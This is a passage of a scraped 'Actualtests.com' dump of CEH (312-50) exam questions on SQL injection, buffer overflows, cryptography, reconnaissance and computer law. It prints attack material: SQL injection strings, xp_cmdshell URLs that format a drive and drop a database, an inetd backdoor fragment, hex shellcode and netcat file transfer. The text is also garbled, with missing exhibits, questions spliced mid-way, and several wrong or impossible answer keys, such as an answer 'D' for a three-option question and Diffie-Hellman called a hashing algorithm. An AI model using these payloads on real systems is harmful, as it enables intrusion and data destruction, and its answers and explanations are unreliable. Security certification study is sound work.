B. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over
Jason's session.
C. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools.
D. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.
Answer: A
Explanation: The following part:
Attempted login of unknown user: pete '';
Attempted login of unknown user: ' or 1=1-Attempted login of unknown user: '; drop table logins-Clearly shows a hacker trying to perform a SQL injection by bypassing the login with the statement 1=1 and then dumping the logins table.
QUESTION 302:
Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit.
Choose the attack type from the choices given below.
A. Database Fingerprinting
B. Database Enumeration
C. SQL Fingerprinting
D. SQL Enumeration
Answer: A
Explanation: He is trying to create a view of the characteristics of the target database, he is taking it's fingerprints.
QUESTION 303:

Actualtests.com - The Power of Knowing

312-50
Bob has been hired to do a web application security test. Bob notices that the site is dynamic and infers that they mist be making use of a database at the application back end. Bob wants to validate whether SQL Injection would be possible.
What is the first character that Bob should use to attempt breaking valid SQL requests? A. Semi Column
B. Double Quote
C. Single Quote
D. Exclamation Mark
Answer: C
Explanation: In SQL single quotes are used around values in queries, by entering another single quote Bob tests if the application will submit a null value and probably returning an error.
QUESTION 304:
Exhibit:

Actualtests.com - The Power of Knowing

312-50
You are conducting pen-test against a company's website using SQL Injection techniques. You enter "anuthing or 1=1-" in the username filed of an authentication form. This is the output returned from the server.
What is the next step you should do?
A. Identify the user context of the web application by running_ http://www.example.com/order/include_rsa_asp?pressReleaseID=5 AND
USER_NAME() = 'dbo'
B. Identify the database and table name by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects
WHERE
xtype='U'),1))) > 109
C. Format the C: drive and delete the database by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'format c: /q /yes '; drop database myDB; -D. Reboot the web server by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -reboot'; -Answer: A
QUESTION 305:
Your boss Certkiller is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack?
A. SQL Input attack
B. SQL Piggybacking attack
C. SQL Select attack
D. SQL Injection attack
Answer: D
Explanation: This technique is known as SQL injection attack
QUESTION 306:
Which of the following activities will not be considered passive footprinting?
A. Scan the range of IP address found in the target DNS database
B. Perform multiples queries using a search engine
Actualtests.com - The Power of Knowing

312-50

Answer: C
Explanation: Scanning is not considered to be passive footprinting.
QUESTION 307:
When a malicious hacker identifies a target and wants to eventually compromise this target, what would be among the first steps that he would perform? (Choose the best answer)
A. Cover his tracks by eradicating the log files and audit trails.
B. Gain access to the remote computer in order to conceal the venue of attacks.
C. Perform a reconnaissance of the remote target for identical of venue of attacks.
D. Always begin with a scan in order to quickly identify venue of attacks.
Answer: C
Explanation: A hacker always starts with a preparatory phase (Reconnaissance) where he seeks to gather as much information as possible about the target of evaluation prior to launching an attack. The reconnaissance can be either passive or active (or both).
QUESTION 308:
Central Frost Bank was a medium-sized, regional financial institution in New York.
The bank recently deployed a new Internet-accessible Web application. Using this application, Central Frost's customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business through a
Web browser. John Stevens was in charge of information security at Central Frost
Bank. After one month in production, the Internet banking application was the subject of several customer complaints. Mysteriously, the account balances ofmany of Central Frost's customers had been changed! However, moneyhadn't been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:
Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1-Attempted login of unknown user: '; drop table logins-Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Actualtests.com - The Power of Knowing

312-50
Transfer Funds user jason
Pay Bill user mike
Logout of user mike
What type of attack did the Hacker attempt?
A. Brute force attack in which the Hacker attempted guessing login ID and password from password cracking tools.
B. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.
C. The Hacker attempted SQL Injection technique to gain access to a valid bank login
ID.
D. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over
Jason's session.
Answer: C
Explanation:
The 1=1 or drop table logins are attempts at SQL injection.
QUESTION 309:
A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database?
A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database
B. An attacker submits user input that executes an operating system command to compromise a target system
C. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining access
D. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database
Answer: A
Explanation: Using the poorly designed input validation to alter or steal data from a database is a SQL injection attack.
QUESTION 310:
Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database?

Actualtests.com - The Power of Knowing

312-50
A. Jimmy can submit user input that executes an operating system command to compromise a target system
B. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system
C. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected privilege of the database
D. Jimmy can gain control of system to flood the target system with requests, preventing legitimate users from gaining access
Answer: B
Explanation: SQL injection is a security vulnerability that occurs in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
QUESTION 311:
Identify SQL injection attack from the HTTP requests shown below:
A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
B. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
C.
http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hA x D. http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2 f
3e%3c%2fscript%3e
Answer: C
Explantion: The correct answer contains the code to alter the usertable in order to change the password for user smith to hAx0r
QUESTION 312:
What is the problem with this ASP script (login.asp)?

/tmp/x;
/usr/sbin/inetd -s /tmp/x; sleep 10;
/bin/ rm -f /tmp/x AAAA...AAA
In the above exploit code, the command "/bin/sh sh -I"is given.
What is the purpose, and why is 'sh' shown twice?
A. The command /bin/sh sh -i appearing in the exploit code is actually part of an inetd configuration file.
B. The length of such a buffer overflow exploit makes it prohibitive for user to enter manually. The second 'sh' automates this function.
C. It checks for the presence of a codeword (setting the environment variable) among the
Actualtests.com - The Power of Knowing

312-50 environment variables.
D. It is a giveaway by the attacker that he is a script kiddy.
Answer: A
Explanation:
What's going on in the above question is the attacker is trying to write to the unix filed /tm/x (his inetd.conf replacement config) -- he is attempting to add a service called ingresslock (which doesnt exist), which is "apparently" suppose to spawn a shell the given port specified by /etc/services for the service "ingresslock", ingresslock is a non-existant service, and if an attempt were made to respawn inetd, the service would error out on that line. (he would have to add the service to
/etc/services to suppress the error). Now the question is asking about /bin/sh sh -i which produces an error that should read "sh: /bin/sh: cannot execute binary file", the -i option places the shell in interactive mode and cannot be used to respawn itself. QUESTION 427:
You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server. While it is effective, you find it tedious to perform extended functions. On further research you come across a perl script that runs the following msadc functions:

What kind of exploit is indicated by this script?
A. A buffer overflow exploit.
B. A SUID exploit.
C. A SQL injection exploit.
D. A chained exploit.
E. A buffer under run exploit.
Answer: D
QUESTION 428:
The programmers on your team are analyzing the free, open source software being
Actualtests.com - The Power of Knowing

312-50 used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() on the source code. These C++ functions do not check bounds.
What kind of attack is this program susceptible to?
A. Buffer of Overflow
B. Denial of Service
C. Shatter Attack
D. Password Attack
Answer: A
Explanation: C users must avoid using dangerous functions that do not check bounds unless they've ensured that the bounds will never get exceeded. A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed length buffer and write at least one value outside that buffer's boundaries
(usually past its end). A buffer overflow can occur when reading input from the user into a buffer, but it can also occur during other kinds of processing in a program.
QUESTION 429:
Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats but it does not secure the data from the specific threats but it does no secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it can't mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns?
A. Bob can explain that using a weak key management technique is a form of programming error
B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error
C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique
D. Bob can explain that a random number generation can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error
Answer: C
Explanation: In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a possible breach of system security.
QUESTION 430:

Actualtests.com - The Power of Knowing

312-50
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) then it was intended to hold.
What is the most common cause of buffer overflow in software today?
A. Bad permissions on files.
B. High bandwidth and large number of users.
C. Usage of non standard programming languages.
D. Bad quality assurance on software produced.
Answer: D
Explanation: Technically, a buffer overflow is a problem with the program's internal implementation.
QUESTION 431:
While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is called 'file.txt' but when he opens it, he find the following:

What does this file contain?
A. A picture that has been renamed with a .txt extension.
B. An encrypted file.
C. A uuencoded file.
D. A buffer overflow.
Answer: D
Explanation: This is a buffer overflow exploit with its "payload" in hexadecimal format. Actualtests.com - The Power of Knowing

312-50

QUESTION 432:
Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet.

How can you protect/fix the problem of your application as shown above?
A. Because the counter starts with 0, we would stop when the counter is less than 200
B. Because the counter starts with 0, we would stop when the counter is more than 200
C. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it can't hold any more data
D. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it can't hold any more data
Answer: A,C
Explanation: I=199 would be the character number 200. The stack holds exact 200 characters so there is no need to stop before 200.
QUESTION 433:
#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8),
(((x)&0xff0000)16), (((x)&0xff000000)24) char infin_loop[]=
/* for testing purposes */
"\xEB\xFE";
char bsdcode[] =
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
Actualtests.com - The Power of Knowing

312-50
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC]; static char *magic_str=NULL; int before_len=0; char *target=NULL, *username="user", *password=NULL; struct targets getit;
The following exploit code is extracted from what kind of attack?
A. Remote password cracking attack
B. SQL Injection
C. Distributed Denial of Service
D. Cross Site Scripting
E. Buffer Overflow
Answer: E
Explanation: This is a buffer overflow with it's payload in hex format.
QUESTION 434:
StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and
Microsoft's /GS option use _____ defense against buffer overflow attacks.
A. Canary
B. Hex editing
C. Format checking
D. Non-executing stack
Answer: A
Explanation: Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, it will clobber the canary, making the overflow evident. This is a reference to the historic practice of using canaries in coal mines, since they would be affected by toxic gases earlier than the miners, thus providing a biological warning system. QUESTION 435:
A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered
Actualtests.com - The Power of Knowing

312-50 when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate?
A. The system has crashed
B. A buffer overflow attack has been attempted
C. A buffer overflow attack has already occurred
D. A firewall has been breached and this is logged
E. An intrusion detection system has been triggered
Answer: B
Explanation: Terminator Canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction to this observation is that the canaries are built of
NULL terminators, CR, LF, and -1. The undesirable result is that the canary is known. QUESTION 436:
Choose one of the following pseudo codes to describe this statement:
If we have written 200 characters to the buffer variable, the stack should stop because it cannot hold any more data.
A. If (I > 200) then exit (1)
B. If (I < 200) then exit (1)
C. If (I = 200) then exit (1)
Answer: D
QUESTION 437:
Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic.
She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would line to tunnel the information to the remote end but does not have VPN capabilities to do so.
Which of the following tools can she use to protect the link?
A. MD5
B. SSH
C. RSA
D. PGP
Answer: B
Explanation: Port forwarding, or tunneling, is a way to forward otherwise insecure
Actualtests.com - The Power of Knowing

312-50
TCP traffic through SSH Secure Shell. You can secure for example POP3, SMTP and HTTP connections that would otherwise be insecure.
QUESTION 438:
An attacker runs netcat tool to transfer a secret file between two hosts.
Machine A: netcat -1 -p 1234 < secretfile
Machine B: netcat 192.168.3.4 > 1234
He is worried about information being sniffed on the network.
How would the attacker use netcat to encrypt information before transmitting it on the wire?
A. Machine A: netcat -1 -p -s password 1234 < testfile
Machine B: netcat 1234
B. Machine A: netcat -1 -e magickey -p 1234 < testfile
Machine B: netcat 1234
C. Machine A: netcat -1 -p 1234 < testfile -pw password
Machine B: netcat 1234 -pw password
D. Use cryptcat instead of netcat.
Answer: D
Explanation:
Cryptcat is the standard netcat enhanced with twofish encryption with ports for WIndows
NT, BSD and Linux. Twofish is courtesy of counterpane, and cryptix. A default netcat installation does not contain any cryptography support.
QUESTION 439:
Symmetric encryption algorithms are known to be fast but present great challenges on the key management side. Asymmetric encryption algorithms are slow but allow communication with a remote host without having to transfer a key out of band or in person. If we combine the strength of both crypto systems where we use the symmetric algorithm to encrypt the bulk of the data and then use the asymmetric encryption system to encrypt the symmetric key, what would this type of usage be known as?
A. Symmetric system
B. Combined system
C. Hybrid system
D. Asymmetric system
Answer: C
Explanation: Because of the complexity of the underlying problems, most public-key algorithms involve operations such as modular multiplication and
Actualtests.com - The Power of Knowing

312-50 exponentiation, which are much more computationally expensive than the techniques used in most block ciphers, especially with typical key sizes. As a result, public-key cryptosystems are commonly "hybrid" systems, in which a fast symmetric-key encryption algorithm is used for the message itself, while the relevant symmetric key is sent with the message, but encrypted using a public-key algorithm. Similarly, hybrid signature schemes are often used, in which a cryptographic hash function is computed, and only the resulting hash is digitally signed. QUESTION 440:
Steven the hacker realizes that the network administrator of Certkiller is using syskey to protect organization resources in the Windows 2000 Server. Syskey independently encrypts the hashes so that physical access to the server, tapes, or
ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows
2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch attach.
How many bits does Syskey use for encryption?
A. 40 bit
B. 64 bit
C. 256 bit
D. 128 bit
Answer: D
Explanation: SYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.
QUESTION 441:
In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up Bob's public key in a directory, uses it to encrypt the message before sending it off. Bob then uses his private key to decrypt the message and reads it. No one listening on can decrypt the message.
Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many people may know Bob's public key and use it to verify Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What does this principle refer to?
A. Irreversibility
B. Non-repudiation
C. Symmetry
Actualtests.com - The Power of Knowing

312-50
D. Asymmetry
Answer: D
Explanation: PKI uses asymmetric key pair encryption.One key of the pair is the only way to decrypt data encrypted with the other.
QUESTION 442:
What is SYSKEY # of bits used for encryption?
A. 40
B. 64
C. 128
D. 256
Answer: C
Explanation:
System Key hotfix is an optional feature which allows stronger encryption of SAM.
Strong encryption protects private account information by encrypting the password data using a 128-bit cryptographically random key, known as a password encryption key.
QUESTION 443:
Which of the following is NOT true of cryptography?
A. Science of protecting information by encoding it into an unreadable format
B. Method of storing and transmitting data in a form that only those it is intended for can read and process
C. Most (if not all) algorithms can be broken by both technical and non-technical means
D. An effective way of protecting sensitive information in storage but not in transit
Answer: D
Explanation: Cryptography will protect data in both storage and in transit.
QUESTION 444:
Which of the following best describes session key creation in SSL?
A. It is created by the server after verifying theuser's identity
B. It is created by the server upon connection by the client
C. It is created by the client from the server's public key
D. It is created by the client after verifying the server's identity

Actualtests.com - The Power of Knowing

312-50
Answer: D
Explanation: An SSL session always begins with an exchange of messages called the
SSL handshake. The handshake allows the server to authenticate itselfto the client using public-key techniques, then allows the client and the server to cooperate in the creation of symmetric keys used for rapid encryption, decryption, and tamper detection during the session that follows. Optionally, the handshake also allows the client to authenticate itself to the server.
QUESTION 445:
Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is valid on the server. Why do you think this is possible?
A. Any cookie can be replayed irrespective of the session status
B. The scenario is invalid as a secure cookie cannot be replayed
C. It works because encryption is performed at the network layer (layer 1 encryption)
D. It works because encryption is performed at the application layer (single encryption key) Answer: D
QUESTION 446:
How many bits encryption does SHA-1 use?
A. 64 bits
B. 128 bits
C. 160 bits
D. 256 bits
Answer: C
Explanation:
SHA-1 (as well as SHA-0) produces a 160-bit digest from a message with a maximum length of 264 - 1 bits, and is based on principles similar to those used by
Professor Ronald L. Rivest of MIT in the design of the MD4 and MD5 message digest algorithms.
QUESTION 447:
_____ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext
(encrypted text) data of the same length.

Actualtests.com - The Power of Knowing

312-50
A. Bit Cipher
B. Hash Cipher
C. Block Cipher
D. Stream Cipher
Answer: C
Explanation: A block cipher is a symmetric key cipher which operates on fixed-length groups of bits, termed blocks, with an unvarying transformation. When encrypting, a block cipher might take a (for example) 128-bit block of plaintext as input, and output a corresponding 128-bit block of ciphertext.
QUESTION 448:
There is some dispute between two network administrators at your company. Your boss asks you to come and meet with the administrators to set the record straight.
Which of these are true about PKI and encryption?
Select the best answers.
A. PKI provides data with encryption, compression, and restorability.
B. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman.
C. When it comes to eCommerce, as long as you have authenticity, and authenticity, you do not need encryption.
D. RSA is a type of encryption.
Answer: B, D
Explanation:
PKI provides confidentiality, integrity, and authenticity of the messages exchanged between these two types of systems. The 3rd party provides the public key and the receiver verifies the message with a combination of the private and public key.
Public-key encryption WAS invented in 1976 by Whitfield Diffie and Martin
Hellman. The famous hashing algorithm Diffie-Hellman was named after them. The
RSA Algorithm is created by the RSA Security company that also has created other widely used encryption algorithms.
QUESTION 449:
Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate.
What would you call this kind of activity?
A. CI Gathering
B. Scanning
C. Dumpster Diving
Actualtests.com - The Power of Knowing

312-50
D. Garbage Scooping
Answer: C
QUESTION 450:
A client has approached you with a penetration test requirements. They are concerned with the possibility of external threat, and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their respective department.
What kind of penetration test would you recommend that would best address the client's concern?
A. A Black Box test
B. A Black Hat test
C. A Grey Box test
D. A Grey Hat test
E. A White Box test
F. A White Hat test
Answer: C
QUESTION 451:
In which of the following should be performed first in any penetration test?
A. System identification
B. Intrusion Detection System testing
C. Passive information gathering
D. Firewall testing
Answer: C
QUESTION 452:
Vulnerability mapping occurs after which phase of a penetration test?
A. Host scanning
B. Passive information gathering
C. Analysis of host scanning
D. Network level discovery
Answer: C
Explanation:
Actualtests.com - The Power of Knowing

312-50
The order should be Passive information gathering, Network level discovery, Host scanning and Analysis of host scanning.
QUESTION 453:
Why would you consider sending an email to an address that you know does not exist within the company you are performing a Penetration Test for?
A. To determine who is the holder of the root account
B. To perform a DoS
C. To create needless SPAM
D. To illicit a response back that will reveal information about email servers and how they treat undeliverable mail
E. To test for virus protection
Answer: D
Explanation: Sending a bogus email is one way to find out more about internal servers. Also, to gather additional IP addresses and learn how they treat mail.
QUESTION 454:
Which type of attack is port scanning?
A. Web server attack
B. Information gathering
C. Unauthorized access
D. Denial of service attack
Answer: B
QUESTION 455:
DRAG DROP
A Successfully Attack by a malicious hacker can divide into five phases,
Match the order:

Actualtests.com - The Power of Knowing

312-50

Answer:

Explanation:
* Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.
* In Second Phase Hacker starts to scan the remote host to gather information about OS
Actualtests.com - The Power of Knowing

312-50 using, Opened Ports etc.
* After gathering information about the remote hosts starts to gain access to remote host.
So, Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.
QUESTION 456:
Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a private investigative agency to go through garbage, recycled paper, and other rubbish at Scamster's office site in order to find relevant information. What would you call this kind of activity?
A. Garbage Scooping
B. Dumpster Diving
C. Scanning
D. CI Gathering
Answer: B
Explanation: Dumpster diving is the colloquial name for going through somebody's garbage -- which will usually be in dumpsters for large organizations. This is a powerful tactic because it is protected by social taboos. Trash is bad, and once it goes into the trash, something is best forgotten. The reality is that most company trash is fairly clean, and provides a gold mine of information.
QUESTION 457:
Which definition below best describes a covert channel?
A. Making use of a Protocol in a way it was not intended to be used
B. It is the multiplexing taking place on communication link
C. It is one of the weak channels used by WEP that makes it insecure
D. A Server Program using a port that is not well known
Answer: A
Explanation: A covert channel is a hidden communication channel not intended for information transfer at all. Redundancy can often be used to communicate in a covert way. There are several ways that hidden communication can be set up.
QUESTION 458:
Peter has been monitoring his IDS and sees that there are a huge number of ICMP
Echo Reply packets that are being received on the External Gateway interface.
Further inspection reveals they are not responses from internal hosts request but simply responses coming from the Internet. What could be the likely cause of this?
Actualtests.com - The Power of Knowing

312-50

A. Someone Spoofed Peter's IP Address while doing a land attack
B. Someone Spoofed Peter's IP Address while doing a DoS attack
C. Someone Spoofed Peter's IP Address while doing a smurf Attack
D. Someone Spoofed Peter's IP address while doing a fraggle attack
Answer: C
QUESTION 459:
The United Kingdom (UK) he passed a law that makes hacking into an unauthorized network a felony.
The law states:
Section1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer.
For a successful conviction under this part of the Act, the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-graden hacking.
Section 2 of the deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offense (any offence which attacks a custodial sentence of more than five years, not necessarily one covered but the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed.
Section 3 Offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For conviction to succeed there must have been the intent to cause the modifications and knowledge that the modification had not been authorized
What is the law called?
A. Computer Misuse Act 1990
B. Computer incident Act 2000
C. Cyber Crime Law Act 2003
D. Cyber Space Crime Act 1995
Answer: A
Explanation: Computer Misuse Act (1990) creates three criminal offences:
1. Unauthorised access to computer material
2. Unauthorised access to a computer system with intent to commit or facilitate the
Actualtests.com - The Power of Knowing

312-50 commission of a further offence
3. Unauthorised modification of computer material
QUESTION 460:
Which of the following best describes Vulnerability?
A. The loss potential of a threat
B. An action or event that might prejudice security
C. An agent that could take advantage of a weakness
D. A weakness or error that can lead to compromise
Answer: D
Explanation: A vulnerability is a flaw or weakness in system security procedures, design or implementation that could be exercised (accidentally triggered or intentionally exploited) and result in a harm to an IT system or activity.
QUESTION 461:
Steven works as a security consultant and frequently performs penetration tests for
Fortune 500 companies. Steven runs external and internal tests and then creates reports to show the companies where their weak areas are. Steven always signs a non-disclosure agreement before performing his tests. What would Steven be considered? A. Whitehat Hacker
B. BlackHat Hacker
C. Grayhat Hacker
D. Bluehat Hacker
Answer: A
Explanation: A white hat hacker, also rendered as ethical hacker, is, in the realm of information technology, a person who is ethically opposed to the abuse of computer systems. Realization that the Internet now represents human voices from around the world has made the defense of its integrity an important pastime for many. A white hat generally focuses on securing IT systems, whereas a black hat (the opposite) would like to break into them.
QUESTION 462:
Which of the following act in the united states specifically criminalizes the transmission of unsolicited commercial e-mail(SPAM) without an existing business relationship. Actualtests.com - The Power of Knowing

312-50
A. 2004 CANSPAM Act
B. 2003 SPAM Preventing Act
C. 2005 US-SPAM 1030 Act
D. 1990 Computer Misuse Act
Answer: A
Explanation: The CAN-SPAM Act of 2003 (Controlling the Assault of Non-Solicited
Pornography and Marketing Act) establishes requirements for those who send commercial email, spells out penalties for spammers and companies whose products are advertised in spam if they violate the law, and gives consumers the right to ask emailers to stop spamming them. The law, which became effective January 1, 2004, covers email whose primary purpose is advertising or promoting a commercial product or service, including content on a Web site. A "transactional or relationship message" - email that facilitates an agreed-upon transaction or updates a customer in an existing business relationship - may not contain false or misleading routing information, but otherwise is exempt from most provisions of the CAN-SPAM Act.
QUESTION 463:
Certkiller .com is legally liable for the content of email that is sent from its systems, regardless of whether the message was sent for private or business-related purpose.
This could lead to prosecution for the sender and for the company's directors if, for example, outgoing email was found to contain material that was pornographic, racist or likely to incite someone to commit an act of terrorism.
You can always defend yourself by "ignorance of the law" clause.
A. True
B. False
Answer: B
Explanation: Ignorantia juris non excusat or Ignorantia legis neminem excusat
(Latin for "ignorance of the law does not excuse" or "ignorance of the law excuses no one") is a public policy holding that a person who is unaware of a law may not escape liability for violating that law merely because he or she was unaware of its content; that is, persons have presumed knowledge of the law. Presumed knowledge of the law is the principle in jurisprudence that one is bound by a law even if one does not know of it. It has also been defined as the "prohibition of ignorance of the law". QUESTION 464:
The terrorist organizations are increasingly blocking all traffic from North America or from Internet Protocol addresses that point to users who rely on the English
Language.
Actualtests.com - The Power of Knowing

312-50
Hackers sometimes set a number of criteria for accessing their website. This information is shared among the co-hackers. For example if you are using a machine with the Linux Operating System and the Netscape browser then you will have access to their website in a convert way. When federal investigators using PCs running windows and using Internet Explorer visited the hacker's shared site, the hacker's system immediately mounted a distributed denial-of-service attack against the federal system.
Companies today are engaging in tracking competitor's through reverse IP address lookup sites like whois.com, which provide an IP address's domain. When the competitor visits the companies website they are directed to a products page without discount and prices are marked higher for their product. When normal users visit the website they are directed to a page with full-blown product details along with attractive discounts. This is based on IP-based blocking, where certain addresses are barred from accessing a site.
What is this masking technique called?
A. Website Cloaking
B. Website Filtering
C. IP Access Blockade
D. Mirrored WebSite
Answer: A
Explanation: Website Cloaking travels under a variety of alias including Stealth,
Stealth scripts, IP delivery, Food Script, and Phantom page technology. It's hot- due to its ability to manipulate those elusive top-ranking results from spider search engines. QUESTION 465:
Bill has started to notice some slowness on his network when trying to update his company's website while trying to access the website from the Internet. Bill asks the help desk manager if he has received any calls about slowness from the end users, but the help desk manager says that he has not. Bill receives a number of calls from customers that can't access the company website and can't purchase anything online. Bill logs on to a couple of this routers and notices that the logs shows network traffic is at all time high. He also notices that almost all the traffic is originating from a specific address.
Bill decides to use Geotrace to find out where the suspect IP is originates from. The
Geotrace utility runs a traceroute and finds that IP is coming from Panama. Bill knows that none of his customers are in Panama so he immediately thinks that his company is under a Denial of Service attack. Now Bill needs to find out more about the originating IP Address.
What Internet registry should Bill look in to find the IP Address?
A. LACNIC
Actualtests.com - The Power of Knowing

312-50
B. ARIN
C. RIPELACNIC
D. APNIC
Answer: A
Explanation: LACNIC is the Latin American and Caribbean Internet Addresses
Registry that administers IP addresses, autonomous system numbers, reverse DNS, and other network resources for that region.
QUESTION 466:
System Administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup posting to glean insight into the makeup of a target network. How would you search for these posting using Google search?
A. Search in Google using the key strings "the target company" and "newsgroups"
B. Search for the target company name at http://groups.google.com
C. Use NNTP websites to search for these postings
D. Search in Google using the key search strings "the target company" and
"forums"
Answer: B
Explanation: Using http://groups.google.com is the easiest way to access various newsgroups today. Before http://groups.google.com you had to use special NNTP clients or subscribe to some nntp to web services.
QUESTION 467:
Which of the following activities would not be considered passive footprinting?
A. Search on financial site such as Yahoo Financial
B. Perform multiple queries through a search engine
C. Scan the range of IP address found in their DNS database
D. Go through the rubbish to find out any information that might have been discarded
Answer: C
Explanation: Passive footprinting is a method in which the attacker never makes contact with the target. Scanning the targets IP addresses can be logged at the target and therefore contact has been made.
